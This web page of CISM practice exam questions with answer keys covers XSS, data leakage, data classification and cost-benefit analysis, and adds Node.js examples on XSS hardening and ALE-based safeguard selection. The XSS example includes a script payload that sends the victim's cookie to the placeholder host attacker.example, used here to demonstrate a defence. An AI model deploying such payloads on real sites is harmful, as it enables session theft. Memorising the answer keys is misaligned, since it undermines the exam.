Free ISACA CISM Exam Braindumps (page: 68)

Attackers who exploit cross-site scripting vulnerabilities take advantage of:

  A. a lack of proper input validation controls.
  B. weak authentication controls in the web application layer.
  C. flawed cryptographic secure sockets layer (SSL) implementations and short key lengths.
  D. implicit web application trust relationships.

Answer(s): A

Explanation:

Cross-site scripting (XSS) attacks succeed because the application accepts attacker-controlled input without proper validation and then returns it to other users' browsers as part of a page, where it is interpreted as markup and executes as script; the defence is input validation combined with contextual output encoding. Attackers who exploit weak application authentication controls gain unauthorized access to the application, which has little to do with cross-site scripting vulnerabilities. Attackers who exploit flawed cryptographic secure sockets layer (SSL) implementations and short key lengths can sniff network traffic and crack keys to gain unauthorized access to information; this, too, has little to do with cross-site scripting vulnerabilities. Implicit web application trust relationships are what cross-site request forgery (CSRF) abuses; they do not relate directly to cross-site scripting.
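As an added example, not part of the exam page, the Node.js snippet below shows a hypothetical search page that reflects a query parameter. The vulnerable function concatenates the untrusted value straight into the markup; the hardened function applies an allow-list validation and HTML output encoding. The function names, the `attacker.example` host and the payload are constructed for the demonstration and are not from any real application.

```javascript
// Added example (not from the exam page): a reflected XSS sink and its hardened form.
// Hypothetical search page that echoes the "q" parameter into the response body.

// Vulnerable: the untrusted query is concatenated straight into the HTML, so a
// value containing markup is rendered as markup and any <script> in it executes.
function renderSearchVulnerable(q) {
  return `<p>Results for: ${q}</p>`;
}

// Defence 1, input validation (allow-list): a search term is letters, digits,
// spaces and a little punctuation, 1 to 64 characters. Anything else is rejected.
const SEARCH_TERM = /^[A-Za-z0-9 .,'-]{1,64}$/;
function validateSearchTerm(q) {
  return typeof q === 'string' && SEARCH_TERM.test(q);
}

// Defence 2, contextual output encoding for an HTML text node: the five characters
// that can change the meaning of the markup are replaced with entities.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function htmlEncode(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// Hardened: validate, then encode. Rejected requests get a fixed error page so the
// bad value never reaches the response at all.
function renderSearchHardened(q) {
  if (!validateSearchTerm(q)) {
    return { status: 400, body: '<p>Invalid search term.</p>' };
  }
  return { status: 200, body: `<p>Results for: ${htmlEncode(q)}</p>` };
}

// A free-text field (say, a comment) cannot use such a strict allow-list, so here
// output encoding alone is what neutralizes the sink: the payload is displayed as
// text instead of being executed.
function renderCommentEncodedOnly(text) {
  return `<div class="comment">${htmlEncode(text)}</div>`;
}

// Crude check used in the usage below: does the rendered markup contain a <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed payload; attacker.example is a placeholder host for the demonstration.
const PAYLOAD = '<script>location="https://attacker.example/?c="+document.cookie</script>';

console.log('vulnerable :', containsScriptTag(renderSearchVulnerable(PAYLOAD)));   // true
console.log('hardened   :', renderSearchHardened(PAYLOAD).status);                  // 400
console.log('comment    :', containsScriptTag(renderCommentEncodedOnly(PAYLOAD))); // false
```

The allow-list is what the exam answer points at, but note that the comment case is why practitioners treat output encoding as the primary XSS control: validation narrows the attack surface, encoding is what stops the sink from interpreting data as code.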



Which of the following would BEST address the risk of data leakage?

  A. File backup procedures
  B. Database integrity checks
  C. Acceptable use policies
  D. Incident response procedures

Answer(s): C

Explanation:

Acceptable use policies set out what users may and may not do with the organization's information and are therefore, among the choices offered, the best measure for preventing the unauthorized disclosure of confidential information. File backup procedures and database integrity checks address availability and integrity rather than confidentiality, and incident response procedures come into play only after a leak has already occurred.



A company recently developed a breakthrough technology. Since this technology could give this company a significant competitive edge, which of the following would FIRST govern how this information is to be protected?

  A. Access control policy
  B. Data classification policy
  C. Encryption standards
  D. Acceptable use policy

Answer(s): B

Explanation:

Data classification policies define the level of protection to be provided for each category of data. Without this mandated ranking of degree of protection, it is difficult to determine what access controls or levels of encryption should be in place. An acceptable use policy is oriented more toward the end user and, therefore, would not specifically address what controls should be in place to adequately protect information.



What is the BEST technique to determine which security controls to implement with a limited budget?

  A. Risk analysis
  B. Annualized loss expectancy (ALE) calculations
  C. Cost-benefit analysis
  D. Impact analysis

Answer(s): C

Explanation:

Cost-benefit analysis is performed to ensure that the cost of a safeguard does not outweigh its benefit and that the best safeguard is provided for the cost of implementation. Risk analysis identifies the risks and suggests appropriate mitigation, but does not by itself rank safeguards by value for money. The annualized loss expectancy (ALE) is an input to a cost-benefit analysis: it quantifies the expected annual loss a safeguard would reduce, but on its own says nothing about what the safeguard costs. Impact analysis would indicate how much could be lost if a specific threat occurred.
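As an added example that is not part of the exam page, the snippet below carries the explanation through in code: ALE is computed per risk, each candidate safeguard is scored by the ALE it removes minus its annual cost, and the set of worthwhile safeguards that fits a fixed budget is chosen. The risks, control names, loss figures and budget are all constructed for illustration, and the selection assumes each control addresses a distinct risk so that benefits add up.

```javascript
// Added example (not from the exam page): selecting safeguards under a fixed budget
// with a cost-benefit analysis driven by annualized loss expectancy (ALE).
// All risks, controls and figures below are constructed for illustration.

// ALE = SLE x ARO: single loss expectancy (cost of one occurrence) times the
// annualized rate of occurrence. Rounded to whole currency units.
function ale(sle, aro) {
  return Math.round(sle * aro);
}

// Each candidate control mitigates one distinct risk (so benefits are additive) by
// lowering that risk's ARO, and has an annual cost. Hypothetical figures.
const CANDIDATES = [
  { name: 'DB activity monitoring', risk: 'customer DB breach', sle: 400000, aroBefore: 0.10, aroAfter: 0.05, cost: 12000 },
  { name: 'offsite backups',        risk: 'ransomware outage',  sle: 250000, aroBefore: 0.20, aroAfter: 0.04, cost: 30000 },
  { name: 'web app firewall',       risk: 'website defacement', sle: 40000,  aroBefore: 0.50, aroAfter: 0.10, cost: 15000 },
  { name: 'badge reader upgrade',   risk: 'office intrusion',   sle: 50000,  aroBefore: 0.05, aroAfter: 0.01, cost: 9000  },
];

// Cost-benefit figures for one control: the benefit is the ALE it removes, the net
// is benefit minus annual cost. A control with net <= 0 costs more than it saves.
function evaluateControl(c) {
  const aleBefore = ale(c.sle, c.aroBefore);
  const aleAfter = ale(c.sle, c.aroAfter);
  const benefit = aleBefore - aleAfter;
  return { name: c.name, cost: c.cost, aleBefore, aleAfter, benefit, net: benefit - c.cost };
}

// Pick the subset of worthwhile controls that fits the budget and maximizes total
// net benefit. Exhaustive search over subsets; fine for a handful of candidates.
function selectControls(candidates, budget) {
  const worth = candidates.map(evaluateControl).filter((e) => e.net > 0);
  let best = { names: [], cost: 0, net: 0 };
  for (let mask = 1; mask < (1 << worth.length); mask++) {
    let cost = 0;
    let net = 0;
    const names = [];
    worth.forEach((e, i) => {
      if (mask & (1 << i)) { cost += e.cost; net += e.net; names.push(e.name); }
    });
    if (cost <= budget && net > best.net) best = { names: names.sort(), cost, net };
  }
  return best;
}

console.table(CANDIDATES.map(evaluateControl));
console.log(selectControls(CANDIDATES, 45000)); // { names: ['DB activity monitoring', 'offsite backups'], cost: 42000, net: 18000 }
```

With the constructed figures the badge reader upgrade removes only 2,000 a year of expected loss against a 9,000 annual cost, so it is never selected regardless of budget; at a 45,000 budget the two highest-net controls fit, while at 40,000 only the backups do, because the search maximizes net benefit rather than spending the whole budget.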





